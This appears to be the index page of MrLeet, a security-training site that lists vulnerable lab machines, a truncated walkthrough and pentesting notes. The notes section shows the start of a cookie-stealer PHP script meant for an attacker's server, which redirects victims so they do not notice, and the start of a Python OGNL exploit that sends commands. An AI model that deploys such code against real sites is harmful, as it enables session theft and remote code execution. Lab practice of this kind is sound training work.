Latest vulnerable machines- MrLeet


MrLeet provides vulnerables machines allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
Machine: Matrix_4
By: unknowndevice64 2022-12-05 08:56:27

MrLeet

Machine Details: Matrix is a medium+ level boot2root challenge Series of MATRIX Machines. The OVA has been tested on both VMware and Virtual Box.

Flags: Your Goal is to get root and read /root/flag.txt

Networkin...

Machine Size: 799
Machine OS: linux
Machine Level: intermediate


Score: 0

Machine: Matrix_3
By: unknowndevice64 2019-07-09 12:50:59

MrLeet

Machine Details: Matrix is a medium level boot2root challenge Series of MATRIX Machines. The OVA has been tested on both VMware and Virtual Box.

Flags: Your Goal is to get root and read /root/flag.txt

Networking...

Machine Size: 554
Machine OS: linux
Machine Level: intermediate


Score: 0

Machine: DC-6
By: dcau 2019-05-18 11:12:55

MrLeet

Machine Details: DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This isn't an overly difficult challenge so should be great for beginn...

Machine Size: 618
Machine OS: linux
Machine Level: intermediate


Score: 0

Latest walkthrough of machines- MrLeet


MrLeet provides walkthrough of vulnerable machines allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
Walkthrough of: Matrix_1
By: unknowndevice64 2019-05-17 12:40:46

MrLeet

Discovery
First, we need to recognize the IP that the machine is using, I use arp-scan for the job but you can use netdiscover or nmap to do the trick, with arp-scan is like this:

arp-scan -l
This puts out a list of all the machines in the network that a re sending ARP packets, the output looks like this:

The IP of the machine identified
With that, we can proceed to do some footprinting u...


Score: 0

Latest notes for PenTesting- MrLeet


MrLeet provides useful notes from different hackers allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

// Upload/Save this file on ATTACKER_SERVER cookiestealer.php //
// change this google.com to same website, which you are attacking, so that Victim can't detect. //
// you can find cookie into same directory where you put this file, name log.txt //


<?php
header ('Location:https://google.com');

$cookies = $_GET["c&q...


Score: 0

By: unknowndevice64 2019-10-19 01:28:48

The two most common HTTP methods are: GET and POST.
What is HTTP?
The Hypertext Transfer Protocol (HTTP) is designed to enable communications between clients and servers.
HTTP works as a request-response protocol between a client and server.
A web browser may be the client, and an application on a computer that hosts a web site may be the serve...


Score: 0


#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import httplib
def exploit(url, cmd):
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload +...


Score: 0

Latest picturess useful in PenTesting- MrLeet


MrLeet provides useful pictures from different hackers useful in digital security, computer applications and network administration tasks.
By: unknowndevice64 2019-10-19 01:26:02


Linux Mosy useful command List


Score: 0

By: ajayverma 2019-06-27 11:50:19


owasp top 10 2013 vs 2017 explained_2


Score: 0

By: ajayverma 2019-06-27 11:50:24


owasp top 10 2013 vs 2017 explained_1


Score: 0

By: ajayverma 2019-06-25 12:38:28


JQuery Cheat Sheet


Score: 0

By: ajayverma 2019-06-25 12:38:32


Redux Cheat Sheet


Score: 0

By: ajayverma 2019-06-25 12:10:32


Cheatsheet_WindowsCommandLine part_2


Score: 0